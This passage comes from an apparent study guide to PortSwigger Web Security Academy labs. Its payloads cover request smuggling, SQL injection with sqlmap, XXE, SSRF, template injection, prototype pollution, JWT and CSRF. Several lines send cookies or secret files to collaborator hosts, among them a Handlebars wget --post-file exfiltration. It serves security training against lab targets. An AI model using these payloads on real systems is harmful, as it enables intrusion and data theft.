 521 | [PortSwigger Lab: Exploiting HTTP request smuggling to deliver reflected XSS](https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss)  
 522 | 
 523 | ### TE.CL dualchunk - Transfer-encoding obfuscated  
 524 | 
 525 | >If Duplicate header names are allowed, and the vulnerability is detected as **dualchunk**, then add an additional header with name and value = **Transfer-encoding: cow**.  Use **obfuscation** techniques with second TE.  
 526 | 
 527 | ```
 528 | Transfer-Encoding: xchunked
 529 | 
 530 | Transfer-Encoding : chunked
 531 | 
 532 | Transfer-Encoding: chunked
 533 | Transfer-Encoding: x
 534 | 
 535 | Transfer-Encoding:[tab]chunked
 536 | 
 537 | [space]Transfer-Encoding: chunked
 538 | 
 539 | X: X[\n]Transfer-Encoding: chunked
 540 | 
 541 | Transfer-Encoding
 542 | : chunked
 543 | 
 544 | Transfer-encoding: identity
 545 | Transfer-encoding: cow
 546 | ```  
 547 | 
 548 | >Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is **obfuscation** in some way.  
 549 | 
 550 | >On Repeater menu ensure that the **"Update Content-Length"** option is unchecked.  
 551 | 
 552 | ```html
 553 | POST / HTTP/1.1
 554 | Host: TARGET.websecurity-academy.net
 555 | Content-Type: application/x-www-form-urlencoded
 556 | Content-length: 4
 557 | Transfer-Encoding: chunked
 558 | Transfer-encoding: identity
 559 | 
 560 | e6
 561 | GET /post?postId=4 HTTP/1.1
 562 | User-Agent: a"/><script>document.location='http://COLLAB.com/?c='+document.cookie;</script>
 563 | Content-Type: application/x-www-form-urlencoded
 564 | Content-Length: 15
 565 | 
 566 | x=1
 567 | 0\r\n  
 568 | \r\n
 569 |   
 570 | ```  
 571 | 
 572 | ![gpost Obfuscating the TE header](images/gpost.png)  
 573 | 
 574 | >**Note:** You need to include the trailing sequence **\r\n\r\n** following the final **0**.  
 575 | 
 576 | [PortSwigger Lab: HTTP request smuggling, obfuscating the Transfer-Encoding (TE) header](https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header)  
 577 |   
 578 | >My opinion, this is rare scenario where users visiting site have their request stolen via HTTP Sync vulnerability in exam or live system exploited.  
 579 |   
 580 | 
 581 | # Privilege Escalation  
 582 |   
 583 |   
 584 | ## PrivEsc JSON RoleId  
 585 | 
 586 | >Access control to the admin interface is based on user roles, and this can lead to IDOR or accessc ontrol security vulnerability.  
 587 | 
 588 | >Capture current logged in user email submission request and send to **Intruder**, then add "roleid":§99§ into the JSON body of the request, and fuzz the possible roleid for administrator access role position.  
 589 | 
 590 | ```html
 591 | POST /my-account/change-email HTTP/1.1
 592 | Host: 0a25007604813b07c2066cf20023004d.web-security-academy.net
 593 | Cookie: session=vXAA9EM1hzQuJwHftcLHKxyZKtSf2xCW
 594 | Content-Length: 48
 595 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
 596 | Content-Type: text/plain;charset=UTF-8
 597 | Connection: close
 598 | 
 599 | {
 600 |  "email":"newemail@wiener.peter",
 601 |  "roleid": 2
 602 | }
 603 | ```  
 604 | 
 605 | ![Intruder Payload set to identify Admin role ID](images/intruder-payload-positions.png)  
 606 | 
 607 | >Attack identify the possible role ID of administrator access role and then send this request with updated roleId to privile escalate the current logged in user to role of administator of target.  
 608 | 
 609 | ![Attack identify Admin role ID](images/admin-roleid-privesc.png)  
 610 | 
 611 | [PortSwigger Lab: User role can be modified in user profile](https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile)  
 612 | 
 613 | ## Password Refresh CSRF  
 614 |   
 615 | >Refresh password POST request, then change username parameter to administrator while logged in as low priv user, CSRF where token is not tied to user session.  
 616 | 
 617 | ```html
 618 | POST /refreshpassword HTTP/1.1
 619 | Host: TARGET.web-security-academy.net
 620 | Cookie: session=%7b%22username%22%3a%22carlos%22%2c%22isloggedin%22%3atrue%7d--MCwCFAI9forAezNBAK%2fWxko91dgAiQd1AhQMZgWruKy%2fs0DZ0XW0wkyATeU7aA%3d%3d
 621 | Content-Length: 60
 622 | Cache-Control: max-age=0
 623 | Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
 624 | Sec-Ch-Ua-Mobile: ?0
 625 | Sec-Ch-Ua-Platform: "Linux"
 626 | Upgrade-Insecure-Requests: 1
 627 | Origin: https://TARGET.web-security-academy.net
 628 | Content-Type: application/x-www-form-urlencoded
 629 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
 630 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 631 | X-Forwarded-Host: exploit.exploit-server.net
 632 | X-Host: exploit.exploit-server.net
 633 | X-Forwarded-Server: exploit.exploit-server.net
 634 | Referer: https://TARGET.web-security-academy.net/refreshpassword
 635 | Accept-Encoding: gzip, deflate
 636 | Accept-Language: en-US,en;q=0.9
 637 | Connection: close
 638 | 
 639 | csrf=TOKEN&username=administrator
 640 | ```  
 641 | 
 642 | ![CSRF privesc](images/csrf-privesc.png)  
 643 | 
 644 | [PortSwigger Lab: Password reset broken logic](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic)  
 645 | 
 646 | ## Brute Force Authentication  
 647 | 
 648 | >Cookie value contain the password of the user logged in and is vulnerable to brute-forcing.  
 649 | 
 650 | ![brute](images/brute.png)  
 651 | 
 652 | >Intruder Payload processing, add grep option and the rules in sequenctial order before attack is submitted.  
 653 | 1. Hash: MD5  
 654 | 2. Add prefix: wiener:  
 655 | 3. Encode: Base64-encode.  
 656 | 
 657 | 
 658 | ```bash
 659 | grep 'Update email'
 660 | ```  
 661 | 
 662 | [PortSwigger Lab: Brute-forcing a stay-logged-in cookie](https://portswigger.net/web-security/authentication/other-mechanisms/lab-brute-forcing-a-stay-logged-in-cookie)  
 663 |   
 664 | 
 665 | # Data Exfiltration  
 666 | 
 667 | ## SQL Injection  
 668 | 
 669 | >Error based or Blind SQL injection vulnerabilities, allow SQL queries in an application to be used to extract data or login credentials from the  database. SQLMAP is used to fast track the exploit and retrieve the sensitive information.  
 670 | 
 671 | >Adding a double (") or single quote (') to web parameters and evaluate the SQL error message, identify SQL injection vulnerability.  
 672 | 
 673 | [SQL Injection cheat sheet examples](https://portswigger.net/web-security/sql-injection/cheat-sheet)  
 674 | 
 675 | ![Identify the input parameter vulnerable to SQL injection](images/identify-sqli-parameter.png)  
 676 | 
 677 | >Out of band data exfiltration Blind SQL query, namely a tracking cookie.  
 678 | 
 679 | ```sql
 680 | TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
 681 | ```  
 682 | 
 683 | [PortSwigger Lab: Blind SQL injection with out-of-band data exfiltration](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration)  
 684 | 
 685 | >Using SQLMAP to enumerate tracking cookie by provding -r REQUESTFILE to Load HTTP request from a file.  
 686 | 
 687 | ```bash
 688 | sqlmap -v -r sqli-blind.txt --batch --random-agent --level=5 --risk=3 -p "TrackingId"
 689 | ```  
 690 | 
 691 | [PortSwigger Lab: SQL injection UNION attack, retrieving data from other tables](https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables)  
 692 | 
 693 | ### SQLMAP 
 694 | 
 695 | >Sample SQLMAP commands to determine what SQL injection vulnerability exist and retrieving different types of information from backend database.  
 696 | 
 697 | [SQLMAP Help usage](https://github.com/sqlmapproject/sqlmap/wiki/Usage)  
 698 | 
 699 | >SQLMAP determine the vulnerability, and perform initial enumeration.  
 700 | 
 701 | ```bash
 702 | sqlmap -v -u 'https://TARGET.web.net/filter?category=*' -p "category" --batch --cookie="session=xnxxji87qhGxOdoGKKW1ack4pZxYJlTt" --random-agent --level=3 --risk=3
 703 | ```  
 704 | 
 705 | >SQLMAP determine the database DBMS.  
 706 | 
 707 | ```bash
 708 | sqlmap -v -u 'https://TARGET.web.net/filter?category=*' -p "category" --batch --cookie="session=xnxxji87qhGxOdoGKKW1ack4pZxYJlTt" --random-agent --level=3 --risk=3 --dbms=PostgreSQL -dbs
 709 | ```  
 710 | 
 711 | >SQLMAP determine Database, Tables, dump, data Exfiltration.  
 712 | 
 713 | ```bash
 714 | sqlmap -v -u 'https://TARGET.web.net/filter?category=*' -p "category" --batch --cookie="session=xnxxji87qhGxOdoGKKW1ack4pZxYJlTt" --random-agent --level=3 --risk=3 --dbms=PostgreSQL -D public --tables
 715 | 
 716 | sqlmap -v -u 'https://TARGET.web-security-academy.net/filter?category=*' -p "category" --batch --cookie="session=xnxxji87qhGxOdoGKKW1ack4pZxYJlTt" --random-agent --dbms=PostgreSQL -D public -T users --dump --level=5 --risk=3
 717 | 
 718 | ```  
 719 | 
 720 | ![SQLMAP used to dump data from tables](images/sqlmap-dump-table-data.png)
 721 | 
 722 | 
 723 | >Use SQLMAP Technique parameter set type to error based instead of boolean-based blind vulnerability, and this speed up data exfil process.  
 724 | 
 725 | ```bash
 726 | sqlmap -v -u 'https://TARGET.web.net/filter?category=*' -p 'category' --batch --flush-session --dbms postgresql --technique E --level=5  
 727 | ```  
 728 | 
 729 | ### SQLi Manual Exploit  
 730 | 
 731 | >SQL injection vulnerability exploited manually by first finding list of **tables** in the database.  
 732 | 
 733 | ```sql
 734 | '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
 735 | ```  
 736 | 
 737 | >Second retrieve the names of the **columns** in the users table.  
 738 | 
 739 | ```sql
 740 | '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_qoixrv'--
 741 | ```  
 742 | 
 743 | >Final step **dump data** from the username and passwords columns.  
 744 | 
 745 | ```sql
 746 | '+UNION+SELECT+username_wrrcyp,+password_zwjmpc+FROM+users_qoixrv--
 747 | ``` 
 748 | 
 749 | ![manual-sqli.png](images/manual-sqli.png)  
 750 | 
 751 | [PortSwigger Lab: SQL injection attack, listing the database contents on non-Oracle databases](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle)  
 752 | 
 753 | 
 754 | ## XXE Injections
 755 | 
 756 | >File upload or user import function on web target use XML file format. This can be vulnerable to XML external entity (XXE) injection.  
 757 | 
 758 | ### Identify XML
 759 | 
 760 | >Possible to find XXE attack surface in requests that do not contain any XML.  
 761 | 
 762 | >Identify XXE in not so obvious parameters or requests by adding the below and URL encode the **&** symbol.  
 763 | 
 764 | ```xml
 765 | %26entity;
 766 | ```  
 767 | 
 768 | ![Identify XML Injections](images/identify-xxe.png)
 769 | 
 770 | ### DTD Hosted Exploit  
 771 | 
 772 | >On the exploit server host a exploit file with **Document Type Definition (DTD)** extension, containing the following payload.  
 773 | 
 774 | ```xml
 775 | <!ENTITY % file SYSTEM "file:///home/carlos/secret">
 776 | <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://COLLABORATOR.net/?x=%file;'>">
 777 | %eval;
 778 | %exfil;
 779 | ```  
 780 |   
 781 | ![Exploit.DTD file hosted](images/exploit.dtd.png)  
 782 | 
 783 | >Modify the file upload XML body of the request before sending to the target server.  
 784 | 
 785 | ```xml
 786 | <?xml version="1.0" encoding="UTF-8"?>
 787 | <!DOCTYPE users [<!ENTITY % xxe SYSTEM "https://EXPLOIT.net/exploit.dtd"> %xxe;]>
 788 | <users>
 789 |     <user>
 790 |         <username>Carl Toyota</username>
 791 |         <email>carl@hacked.net</email>
 792 |     </user>    
 793 | </users>
 794 | 
 795 | ```
 796 | 
 797 | ![Exploiting blind XXE to exfiltrate data usding a mlicious exploit DTD file](images/blind-xxe-exploit-dtd.png)  
 798 | 
 799 | [PortSwigger Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)  
 800 | 
 801 | ### Xinclude file read  
 802 | 
 803 | >Webapp **Check Stock** feature use server-side XML document that is parsed, but because the entire XML document, not possible to use a DTD file. Injecting an **XInclude** statement to retrieve the contents of /home/carlos/secret file instead.  
 804 | 
 805 | ```xml
 806 | <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///home/carlos/secret"/></foo>  
 807 | ```  
 808 | 
 809 | ![XInclude to retrieve files](images/xinclude.png)  
 810 | 
 811 | [PortSwigger Lab: Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)  
 812 | 
 813 | 
 814 | ### SQL + XML + HackVector 
 815 | 
 816 | >SQL injection with filter bypass via XML encoding may allow extract of sensitive data.  
 817 | 
 818 | >Identify injection point by using mathematical expression such as **7x7**, and this indicate possible SQL injection or Template injections.
 819 | 
 820 | ![identify-math-evaluated-xml](images/identify-math-evaluated-xml.png)  
 821 | 
 822 | >WAF detect attack when appending SQL query such as a UNION SELECT statement to the original store ID.  
 823 | 
 824 | ```sql
 825 | <storeId>1 UNION SELECT NULL</storeId>
 826 | ```  
 827 | 
 828 | >Bypass the WAF, Use Burp extension **Hackvertor** to [obfuscate](#obfuscation) the SQL Injection payload in the XML post body. 
 829 | 
 830 | ![Web application firewall (WAF) bypass require obfuscate of malicious query with Hackvertor](images/hackvertor.png)  
 831 | 
 832 | >Webapp return one column, thus need to concatenate the returned usernames and passwords columns from the users table.  
 833 |  
 834 | ```xml
 835 | <storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>
 836 | ```  
 837 | 
 838 | ![SQL injection with filter bypass via XML encoding obfuscation](images/xml-sql-obfuscation.png)  
 839 | 
 840 | >SQLi Payloads to read local file, and or output to another folder on target.  
 841 | 
 842 | ```sql
 843 | <@hex_entities>1 UNION all select load_file('/home/carlos/secret')<@/hex_entities>  
 844 | 
 845 | <@hex_entities>1 UNION all select load_file('/home/carlos/secret') into outfile '/tmp/secret'<@/hex_entities>
 846 | ```  
 847 | 
 848 | [PortSwigger Lab: SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)  
 849 |   
 850 | ### Obfuscation
 851 | 
 852 | >URL replacing **.** with %2e  
 853 | 
 854 | >Double-encode the injection  
 855 | 
 856 | ```
 857 | /?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
 858 | ```  
 859 | 
 860 | >HTML encode one or more of the characters  
 861 | 
 862 | ```html
 863 | <img src=x onerror="&#x61;lert(1)">
 864 | ```  
 865 | 
 866 | >XML encode for bypassing WAFs  
 867 | 
 868 | ```xml
 869 | <stockCheck>
 870 |     <productId>
 871 |         123
 872 |     </productId>
 873 |     <storeId>
 874 |          999 &#x53;ELECT * FROM information_schema.tables
 875 |     </storeId>
 876 | </stockCheck>
 877 | ```
 878 | 
 879 | >Multiple encodings together  
 880 | 
 881 | ```html
 882 | <a href="javascript:&bsol;u0061lert(1)">Click me</a>
 883 | ```  
 884 | 
 885 | >SQL CHAR  
 886 | 
 887 | ```sql
 888 | CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
 889 | ```
 890 | 
 891 | [Obfuscating attacks using encodings](https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings)
 892 | 
 893 | ## SSRF - Server Side Request Forgery  
 894 | 
 895 | >SSRF attack cause the server to make a connection to internal services within the organization, or force the server to connect to arbitrary external systems, potentially leaking sensitive data.  
 896 | 
 897 | >SSRF exploitation examples.  
 898 | 
 899 | ```html
 900 | /product/nextProduct?currentProductId=6&path=http://evil-user.net  
 901 | 
 902 | stockApi=http://localhost:6566/admin  
 903 | 
 904 | http://127.1:6566/admin  
 905 | ```  
 906 | 
 907 | >Double URL encode characters in URL such as to Obfuscate the "a" by double-URL encoding it to %2561  
 908 | 
 909 | ![ssrf obfuscated](images/ssrf-obfuscated.png)  
 910 | 
 911 | [PortSwigger Lab: SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)  
 912 | 
 913 | 
 914 | ### Absolute GET URL + HOST SSRF
 915 | 
 916 | >Possible to provide an absolute URL in the GET request line and then supply different target for the HOST header.  
 917 | 
 918 | ```html
 919 | GET https://YOUR-LAB-ID.web-security-academy.net/
 920 | Host: COLLABORATOR.DOMAIN
 921 | ```  
 922 | 
 923 | ![identify-ssrf-host](images/identify-ssrf-host.png)  
 924 | 
 925 | >Use the Host header to target 192.168.0.141 or localhost, and notice the response give 302 status admin interface found. Append /admin to the absolute URL in the request line and send the request. Observe SSRF response.  
 926 | 
 927 | ![ssrf](images/ssrf.png)  
 928 | 
 929 | [PortSwigger Lab: SSRF via flawed request parsing](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-ssrf-via-flawed-request-parsing)  
 930 | 
 931 | 
 932 | ### SSRF redirect_uris  
 933 | 
 934 | >POST request to register data to the client application with redirect URL endpoint in JSON body. Provide a redirect_uris array containing an arbitrary whitelist of callback URIs. Observe the redirect_uri.  
 935 | 
 936 | ```html
 937 | POST /reg HTTP/1.1
 938 | Host: oauth-TARGET.web-security-academy.net
 939 | Content-Type: application/json
 940 | Content-Length: 206
 941 | 
 942 | {
 943 | "redirect_uris":["https://example.com"],
 944 |     "logo_uri" : "https://ct9vlhusb0to24fcrs5t3qsmpdv4jv7k.oastify.com",
 945 | 	"logo_uri" : "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
 946 | 	
 947 | }  
 948 | ```  
 949 | 
 950 | ![ssrf_redirect_uris.png](images/ssrf_redirect_uris.png)  
 951 | 
 952 | [PortSwigger Lab: SSRF via OpenID dynamic client registration](https://portswigger.net/web-security/oauth/openid/lab-oauth-ssrf-via-openid-dynamic-client-registration)  
 953 | 
 954 | ### XXE + SSRF
 955 | 
 956 | >Exploiting XXE to perform SSRF attacks using stock check function that obtains sensitive data.  
 957 | 
 958 | ```xml
 959 | 
 960 | <?xml version="1.0" encoding="UTF-8"?>
 961 |   <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://localhost:6566/latest/"> ]>
 962 |   <stockCheck>
 963 |     <productId>
 964 |       &xxe;
 965 |     </productId>
 966 |     <storeId>
 967 |       1
 968 |     </storeId>
 969 |   </stockCheck>  
 970 | ```  
 971 | 
 972 | ![xxe-ssrf-localhost.png](images/xxe-ssrf-localhost.png)  
 973 | 
 974 | [PortSwigger Lab: Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)  
 975 | 
 976 | 
 977 | ### SSRF HOST header routing  
 978 | 
 979 | >Routing-based SSRF via the Host header allow insecure access to a localhost intranet.  
 980 | 
 981 | ```html
 982 | GET /service/intranet?csrf=QCT5OmPeAAPnyTKyETt29LszLL7CbPop&readfile=/home/carlos/secret HTTP/1.1
 983 | Host: localhost
 984 | ```  
 985 | 
 986 | >**Note:** Convert the GET request to POST.  
 987 | 
 988 | ![Routing-based SSRF](images/Routing-based-SSRF.png)  
 989 | 
 990 | ```html
 991 | POST / HTTP/1.1
 992 | Host: 5rxojasl9trh0xd5pl3m1jqfn6txhp5e.oastify.com
 993 | Cookie: _lab=46%7cMCwCFBucXjC6hvd9WC4%2fwP3%2fkmpxu8mhAhR%2f9lrAED4p89w%2bSBi%2fujGmrnwZhjZyG%2fmQebBgi4naIZO%2flg2daYidh0KoLFjVIEV1DKMwigDLRyL4BspAm4Kiz4iRmXJYyTpvojI18biLNQEbid7G4fT6SvZuUjONK2CLqa%2bc8VqLQcU%3d; session=GvdpmebBL2eNQZMJjJmSh4ZU8QrTDVDq
 994 | Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
 995 | Sec-Ch-Ua-Mobile: ?0
 996 | Sec-Ch-Ua-Platform: "Linux"
 997 | Upgrade-Insecure-Requests: 1
 998 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
 999 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1000 | Accept-Encoding: gzip, deflate
1001 | Accept-Language: en-US,en;q=0.9
1002 | Connection: close
1003 | Content-Type: application/x-www-form-urlencoded
1004 | Content-Length: 0
1005 | ```  
1006 | 
1007 | >Identified SSRF with help from collaborator that other servers can be accessed and so this can allow access to localhost, by changing the **HOST** header.  
1008 | 
1009 | [PortSwigger Lab: Routing-based SSRF](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf)  
1010 | 
1011 | ### HTML to PDF  
1012 | 
1013 | >Identify if SSRF can reach a server which attacker control.  
1014 | 
1015 | ```html
1016 | <div><p>Report Heading by <img src=”https://Collaborator.com/test.png”></p>
1017 | ```  
1018 | 
1019 | >Identify file download HTML-to-PDF convert function on target is vulnerable.  
1020 | 
1021 | ```JavaScript
1022 | <script>
1023 | 	document.write('<iframe src=file:///etc/passwd></iframe>');
1024 | </script>
1025 | ```  
1026 | 
1027 | >Libraries used to convert HTML files to PDF documents are vulnerable to server-side request forgery (SSRF).  
1028 | 
1029 | [PortSwigger Research SSRF](https://portswigger.net/daily-swig/ssrf)  
1030 | 
1031 | >Sample code below can be injected on vulnerable implementation of HTML to PDF converter such as wkhtmltopdf to read local file (SSRF).  
1032 | 
1033 | ```html
1034 | <html>
1035 |  <body>
1036 |   <script>
1037 |    x = new XMLHttpRequest;
1038 |    x.onload = function() {
1039 |     document.write(this.responseText)
1040 |    };
1041 |    x.open("GET", "file:///home/carlos/secret");
1042 |    x.send();
1043 |   </script>
1044 |  </body>
1045 | </html>
1046 | ```  
1047 | 
1048 | >JSON POST request body containing the HTMLtoPDF formatted payload to read local file.  
1049 | 
1050 | ```JSON
1051 | {
1052 | 	"tableHtml":"<div><p>SSRF in HTMLtoPDF</p><iframe src='file:///home/carlos/secret' height='500' width='500'>"
1053 | }
1054 | ```  
1055 | 
1056 | >Random notes on HTML-to-PDF converters & SSRF  
1057 | 
1058 | ```
1059 | "Download report as PDF"
1060 | /adminpanel/save-report/
1061 | POST request - Body JSON 
1062 | { 
1063 | 	"tableHtml":"........<html code snip>......."
1064 | }
1065 | 
1066 | pdf creator: wkhtmltopdf 0.12.5
1067 | hacktricks xss cross site scripting server side xss dynamic pdf 
1068 | ```  
1069 | 
1070 | >SSRF Section incomplete ...need more input...  
1071 | 
1072 | 
1073 | ## SSTI - Server Side Template Injection
1074 | 
1075 | >Use the web framework native template syntax to inject a malicious payload into a **{{template}}**, which is then executed server-side.  
1076 | 
1077 | >SSTI payloads to identify vulnerability.  
1078 | 
1079 | ```
1080 | ${{<%[%'"}}%\.,
1081 | }}{{7*7}} 
1082 | 
1083 | {{fuzzer}}
1084 | ${fuzzer}
1085 | ${{fuzzer}}
1086 | 
1087 | ${7*7}
1088 | <%= 7*7 %>
1089 | ${{7*7}}
1090 | #{7*7}
1091 | ${foobar}
1092 | 
1093 | {% debug %}
1094 | ```  
1095 | 
1096 | >Identification of template injection.  
1097 | 
1098 | ![Identify SSTI](images/identify-ssti.png)  
1099 | 
1100 | >Tornado Template  
1101 | 
1102 | ```
1103 | }}
1104 | {% import os %}
1105 | {{os.system('cat /home/carlos/secret')
1106 | 
1107 | blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')
1108 | ```  
1109 | 
1110 | ![Tornado Template](images/tornado-template.png)  
1111 | 
1112 | [PortSwigger Lab: Basic server-side template injection data exfiltrate](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic-code-context)  
1113 | 
1114 | >Django Template  
1115 | 
1116 | ```
1117 | ${{<%[%'"}}%\,
1118 | {% debug %} 
1119 | {{settings.SECRET_KEY}}
1120 | ```  
1121 | 
1122 | ![Django template](images/django-template.png)  
1123 | 
1124 | [PortSwigger Lab: Server-side template injection with information disclosure via user-supplied objects](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-with-information-disclosure-via-user-supplied-objects)  
1125 | 
1126 | >Freemarker Template  
1127 | 
1128 | ```
1129 | ${foobar}
1130 | <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }
1131 | ```  
1132 | 
1133 | ![Freemarker template](images/freemarker-template.png)  
1134 | 
1135 | [PortSwigger Lab: Server-side template injection using documentation](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation)  
1136 | 
1137 | 
1138 | >ERB Template  
1139 | 
1140 | ```
1141 | <%= 7*7 %>
1142 | <%= system("cat /home/carlos/secret") %>
1143 | ```  
1144 | 
1145 | ![ERB template](images/erb-template.png)  
1146 | 
1147 | [PortSwigger Lab: Basic server-side template injection](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic)  
1148 | 
1149 | 
1150 | >Handlebars Template  
1151 | 
1152 | ```
1153 | ${{<%[%'"}}%\,
1154 | ```  
1155 | 
1156 | ```
1157 | wrtz{{#with "s" as |string|}}
1158 |     {{#with "e"}}
1159 |         {{#with split as |conslist|}}
1160 |             {{this.pop}}
1161 |             {{this.push (lookup string.sub "constructor")}}
1162 |             {{this.pop}}
1163 |             {{#with string.split as |codelist|}}
1164 |                 {{this.pop}}
1165 |                 {{this.push "return require('child_process').exec('wget http://ext.burpcollab.net --post-file=/home/carlos/secret');"}}
1166 |                 {{this.pop}}
1167 |                 {{#each conslist}}
1168 |                     {{#with (string.sub.apply 0 codelist)}}
1169 |                         {{this}}
1170 |                     {{/with}}
1171 |                 {{/each}}
1172 |             {{/with}}
1173 |         {{/with}}
1174 |     {{/with}}
1175 | {{/with}}
1176 | ```
1177 | 
1178 | ![Handlebars template](images/handlebars-template.png)  
1179 | 
1180 | [PortSwigger Lab: Server-side template injection in an unknown language](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)  
1181 | 
1182 | 
1183 | >Random notes on template injections  
1184 | 
1185 | ```
1186 | "Update forgot email template {{}}
1187 | /admin_panel/update_forgot_email/
1188 | POST request newemail parameter
1189 | 
1190 | 
1191 | portswigger.net/research/server-side-template-injection
1192 | {{7*7}}
1193 | portswigger.net/research/template-injection
1194 | 
1195 | wget http://ext.burpcollab.net --post-file=/home/carlos/secret
1196 | ```  
1197 | 
1198 | >SSTI Section ...need more input...  
1199 | 
1200 | ## ProtoType Pollution  
1201 | 
1202 | >A target is vulnerable to DOM XSS via client side prototype pollution. **[DOM Invader](#dom-invader)** will identify the gadget and using hosted payload to phish a victim and steal their cookie.  
1203 | 
1204 | >Exploit server Body section, host an exploit that will navigate the victim to a malicious URL.  
1205 | 
1206 | ```html
1207 | <script>
1208 |     location="https://TARGET.web.net/#__proto__[hitCallback]=alert%28document.cookie%29"
1209 | </script>  
1210 | ```  
1211 | 
1212 | [PortSwigger Lab: Client-side prototype pollution in third-party libraries](https://portswigger.net/web-security/prototype-pollution/finding/lab-prototype-pollution-client-side-prototype-pollution-in-third-party-libraries)
1213 | 
1214 | ![Proto pollution](images/proto-pollution.png)  
1215 | 
1216 | >Proto pollution section is incomplete ...need more input...  
1217 | 
1218 | ## JWT  
1219 | 
1220 | >JSON web tokens (JWTs) use to send cryptographically signed JSON data, and most commonly used to send information ("claims") about users as part of authentication, session handling, and access control.  
1221 | 
1222 | ```jwt
1223 | eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
1224 | ```  
1225 | 
1226 | >Brute force weak JWT signing key  
1227 | 
1228 | ```bash
1229 | hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list 
1230 | ```  
1231 | 
1232 | >JWT-based mechanism for handling sessions. In order to verify the signature, the server uses the **kid** parameter in JWT header to fetch the relevant key from its filesystem. Generate a new **Symmetric Key** and replace **k** property with base64 null byte **AA==**, to be used when signing the JWT.  
1233 | 
1234 | >JWS  
1235 | 
1236 | ```
1237 | {
1238 |     "kid": "../../../../../../../dev/null",
1239 |     "alg": "HS256"
1240 | }
1241 | ```  
1242 | 
1243 | >Payload  
1244 | 
1245 | ```
1246 | {
1247 |     "iss": "portswigger",
1248 |     "sub": "administrator",
1249 |     "exp": 1673523674
1250 | }
1251 | ```  
1252 | 
1253 | ![jwt](images/jwt.png)  
1254 | 
1255 | [PortSwigger Lab: JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal)  
1256 | 
1257 | >JWT section ...need more input...  
1258 | 
1259 | ## CSRF  
1260 | 
1261 | >Cross-Site Request Forgery vulnerability allows an attacker to force users to perform actions that they do not intend to perform.  
1262 |   
1263 | >oAuth linking exploit server hosting iframe, then deliver to victim, forcing user to update code linked.  
1264 | 
1265 | ![csrf](images/csrf.png)  
1266 | 
1267 | >Intercepted the GET /oauth-linking?code=[...]. send to repeat to save code. Drop the request. Important to ensure that the code is not used and, remains valid. Save on exploit server an iframe in which the src attribute points to the URL you just copied.  
1268 | 
1269 | ```html
1270 | <iframe src="https://TARGET.web-security-academy.net/oauth-linking?code=STOLEN-CODE"></iframe>
1271 | ```  
1272 | 
